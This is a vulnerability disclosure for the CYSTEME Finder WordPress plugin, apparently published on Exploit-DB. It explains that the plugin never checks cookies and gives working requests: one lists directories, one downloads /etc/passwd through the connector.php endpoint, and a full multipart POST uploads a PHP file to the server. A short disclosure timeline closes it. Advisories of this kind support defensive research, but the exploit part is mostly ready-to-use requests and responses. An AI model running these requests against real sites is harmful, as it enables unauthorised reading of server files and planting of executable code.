Summary

CYSTEME Finder is a file manager plugin for Wordpress that simplifies file management without the need for FTP or other means. It comes in two flavors, free and pro; You can find it here: CYSTEME Finder, a file explorer

CYSTEME fails to check cookies in the request allowing remote attackers to view, download, and upload files to any location on remote file system.

LFI

Retrieve all data in the root wordpress directory. This will return JSON.

  • Exploit:

http://example.com/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1

  • Reply:
{
  "cwd": {
    "mime": "directory",
    "ts": 1471999484,
    "read": 1,
    "write": 1,
    "size": 0,
    "hash": "l1_Lw",
    "volumeid": "l1_",
    "name": "Fichiers du site",
    "date": "Today 20:44",
    "locked": 1,
    "dirs": 1
  },
  "options": {
    "path": "Fichiers du site",
    "url": null,
    "tmbUrl": "",
    "disabled": [
      
    ],
    "separator": "\/",
    "copyOverwrite": 1,
    "archivers": {
      "create": [
        "application\/x-tar",
        "application\/x-gzip",
        "application\/x-bzip2"
      ],
      "extract": [
        "application\/x-tar",
        "application\/x-gzip",
        "application\/x-bzip2",
        "application\/zip"
      ]
    }
  },
  "files": [
    {
      "mime": "directory",
      "ts": 1471999484,
      "read": 1,
      "write": 1,
      "size": 0,
      "hash": "l1_Lw",
      "volumeid": "l1_",
      "name": "Fichiers du site",
      "date": "Today 20:44",
      "locked": 1,
      "dirs": 1
    },
    {
      "mime": "text\/plain",
      "ts": 1471714510,
      "read": 1,
      "write": 1,
      "size": 813,
      "hash": "l1_Lmh0YWNjZXNz",
      "name": ".htaccess",
      "phash": "l1_Lw",
      "date": "20 Aug 2016 13:35"
    },

Simply replacing wphome with any other directory path will return file information for that directory. If you want to download that file, get the hash value for the file and include it in the following request:

  • Will download /etc/passwd

http://example.com/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1

File Upload

As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following.

POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://example.com HTTP/1.1
Host: http://example.com
Content-Length: 314
Origin: http://example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: multipart/form-data; boundary=--------723608748
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

----------723608748
Content-Disposition: form-data; name="cmd"

upload
----------723608748
Content-Disposition: form-data; name="target"

l1_Lw
----------723608748
Content-Disposition: form-data; name="upload[]"; filename="test.php"
Content-Type: text/html

<?php phpinfo(); ?>
----------723608748--

Timeline:

  • 08/20/2016 - Discovered
  • 08/24/2016 - Reported to Developer
  • 08/28/2016 - No reply from developer.
  • 09/01/2016 - Published on Exploit-DB